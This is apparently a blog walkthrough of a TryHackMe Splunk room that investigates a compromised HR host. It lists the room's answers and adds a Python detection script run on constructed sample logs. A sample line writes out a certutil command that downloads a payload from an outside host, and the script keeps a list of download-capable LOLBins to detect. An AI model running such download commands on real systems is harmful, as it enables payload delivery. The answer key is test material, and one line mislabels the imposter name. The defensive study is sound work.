
Benign | Tryhackme Walkthrough

👋 Hi, I’m Umamaheswari. Through this blog, I share visual walkthroughs and hands-on investigations on PCAP, phishing, Splunk, ELK, malware, and digital forensics—based on labs from TryHackMe, HackTheBox and CyberDefenders. Feel free to connect or ask questions — I am more than happy to help.

Task 1: Introduction

We will investigate host-centric logs in this challenge room to find suspicious process execution. To learn more about Splunk and how to investigate the logs, look at the rooms Splunk 101 and Splunk 201.

Before moving forward, deploy the machine. When you deploy the machine, it will be assigned an IP. Access this room via the AttackBox, or via the VPN at MACHINE_IP. The machine will take up to 3-5 minutes to start.

The required logs are ingested in the index win_eventlogs.

Task 2 Scenario: Identify and Investigate an Infected Host

One of the client’s IDS alerts indicated a potentially suspicious process execution, suggesting that one of the hosts from the HR department was compromised. Some tools related to network information gathering and scheduled tasks were executed, which confirmed the suspicion.

Due to limited resources, we could only pull the process execution logs (Event ID 4688) and ingest them into Splunk under the index win_eventlogs for further investigation.

About the Network Information

The network is divided into three logical segments, which will help in the investigation.

IT Department

  • James

  • Moin

  • Katrina

HR department

  • Haroon

  • Chris

  • Diana

Marketing department

  • Bell

  • Amelia

  • Deepak

Answer the questions below

  1. How many logs are ingested from the month of March, 2022?

Ans: 13959

  2. Imposter Alert: There seems to be an imposter account observed in the logs. What is the name of that user?

Ans: Amel1a

Let’s take a look at the “Usernames” field.

There are a total of 11 usernames, but only 10 are visible.

Let’s list all usernames and how many occurrences of each appear in the events.

“Two usernames are very similar — even though ‘Diana’ is spelled differently, having only one letter difference between two accounts is especially suspicious.”

  3. Which user from the HR department was observed to be running scheduled tasks?

Ans: Chris.fort

  4. Which user from the HR department executed a system process (LOLBIN) to download a payload from a file-sharing host?

Ans: haroon

This is the hint you’re looking for: explore lolbas-project.github.io/ to find binaries that can be used to download payloads.

Look at the executables that are capable of downloading files. There are many of them, so let’s start from the top. When you click on one, you’ll see detailed information on how it’s used. For a deeper understanding, check its associated MITRE ATT&CK techniques; they’re very helpful.

E.g. certutil.exe, which, unlike many of the others, can download files from the Internet.

I looked for each of the executable names above; certutil.exe returned matching events in Splunk.

Use these events to answer the questions below:

The user Haroon used certutil.exe (a legitimate Windows binary) to download benign.exe from the URL https://controlc.com/e4d11035.
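As an added example (not part of the original walkthrough, and not the room's own data or queries), the Python script below reproduces the checks from the username section above and from this certutil finding on a handful of constructed Event ID 4688 records: the event count for one month, usernames within one edit of another account, users who launched a scheduled-task binary, and download-capable LOLBins run with a URL on the command line. The field names UserName, ProcessName and CommandLine, the timestamps and the sample command lines are assumptions; only the certutil URL and the file name benign.exe come from the post. In Splunk the same views come from the time picker, a `stats count by` the username field, and a search over the process and command-line fields.

```python
import re
from datetime import datetime

# Constructed sample records (not from the room) shaped like Event ID 4688
# process-creation events after field extraction. The field names UserName,
# ProcessName and CommandLine are assumptions; the room's own field names may differ.
SAMPLE_EVENTS = [
    {"_time": "2022-02-28T17:55:00", "UserName": "James",
     "ProcessName": "C:\\Windows\\System32\\notepad.exe", "CommandLine": "notepad.exe report.txt"},
    {"_time": "2022-03-01T09:02:00", "UserName": "Amelia",
     "ProcessName": "C:\\Windows\\explorer.exe", "CommandLine": "explorer.exe"},
    {"_time": "2022-03-02T10:15:00", "UserName": "Amel1a",
     "ProcessName": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd.exe /c whoami"},
    {"_time": "2022-03-03T11:20:00", "UserName": "Chris.fort",
     "ProcessName": "C:\\Windows\\System32\\schtasks.exe", "CommandLine": "schtasks.exe /query /fo LIST"},
    {"_time": "2022-03-04T14:30:00", "UserName": "haroon",
     "ProcessName": "C:\\Windows\\System32\\certutil.exe",
     "CommandLine": "certutil.exe -urlcache -split -f https://controlc.com/e4d11035 benign.exe"},
    {"_time": "2022-03-05T08:45:00", "UserName": "Diana",
     "ProcessName": "C:\\Windows\\System32\\certutil.exe",
     "CommandLine": "certutil.exe -hashfile C:\\Users\\Diana\\report.pdf SHA256"},
]


def count_events_in_month(events, year, month):
    """Equivalent of narrowing the Splunk time picker to one month and reading the event count."""
    total = 0
    for e in events:
        t = datetime.fromisoformat(e["_time"])
        if t.year == year and t.month == month:
            total += 1
    return total


def username_counts(events):
    """Every account and how often it appears, the view used to spot the imposter."""
    counts = {}
    for e in events:
        counts[e["UserName"]] = counts.get(e["UserName"], 0) + 1
    return counts


def edit_distance(a, b):
    """Levenshtein distance: 'amel1a' vs 'amelia' scores 1, unrelated names score much higher."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def find_lookalike_usernames(events, max_distance=1):
    """Pairs of distinct accounts whose names differ by at most max_distance edits
    (case-insensitive); a one-character change is the classic imposter pattern."""
    names = sorted(username_counts(events))
    pairs = []
    for i, a in enumerate(names):
        for b in names[i + 1:]:
            if edit_distance(a.lower(), b.lower()) <= max_distance:
                pairs.append((a, b))
    return pairs


SCHEDULED_TASK_BINARIES = {"schtasks.exe", "at.exe"}
DOWNLOAD_LOLBINS = {"certutil.exe", "bitsadmin.exe"}  # both listed on lolbas-project.github.io
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)


def process_basename(event):
    """Strip the directory so 'C:\\Windows\\System32\\certutil.exe' compares as 'certutil.exe'."""
    return event["ProcessName"].rsplit("\\", 1)[-1].lower()


def find_scheduled_task_users(events):
    """Accounts that launched a scheduled-task binary (question 3 of the room)."""
    return {e["UserName"] for e in events if process_basename(e) in SCHEDULED_TASK_BINARIES}


def find_lolbin_downloads(events):
    """Download-capable LOLBins run with a URL on the command line. certutil used for
    hashing (no URL) is not reported, which keeps the legitimate admin use out of the results."""
    hits = []
    for e in events:
        binary = process_basename(e)
        if binary not in DOWNLOAD_LOLBINS:
            continue
        match = URL_RE.search(e["CommandLine"])
        if not match:
            continue
        url = match.group(0)
        saved_as = e["CommandLine"].split()[-1]  # destination file is the trailing argument
        hits.append({"date": e["_time"][:10], "user": e["UserName"], "binary": binary,
                     "site": url.split("/")[2], "url": url,
                     "saved_as": None if saved_as == url else saved_as})
    return hits


if __name__ == "__main__":
    print("March 2022 events:", count_events_in_month(SAMPLE_EVENTS, 2022, 3))
    print("lookalike accounts:", find_lookalike_usernames(SAMPLE_EVENTS))
    print("scheduled-task users:", find_scheduled_task_users(SAMPLE_EVENTS))
    for hit in find_lolbin_downloads(SAMPLE_EVENTS):
        print("download:", hit)
```

The Diana record is there on purpose: certutil computing a file hash is routine administration, so a detection that keys only on the binary name would be noisy. Requiring a URL on the command line (or, in Splunk, searching the command-line field for the download switches together with `http`) separates the LOLBin download from that benign use.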


  5. To bypass the security controls, which system process (LOLBIN) was used to download a payload from the internet?

Ans: certutil.exe

  6. What was the date that this binary was executed by the infected host? Format: YYYY-MM-DD

Ans: 2022-03-04

  7. Which third-party site was accessed to download the malicious payload?

Ans: controlc.com

  8. What is the name of the file that was saved on the host machine from the C2 server during the post-exploitation phase?

Ans: benign.exe

  9. The suspicious file downloaded from the C2 server contained malicious content with the pattern THM{..........}; what is that pattern?

Let’s visit the URL the malicious file was downloaded from.

  10. What is the URL that the infected host connected to?

Ans: https://controlc.com/e4d11035


Thanks for reading! I hope you enjoyed this walkthrough!

Keep Hunting!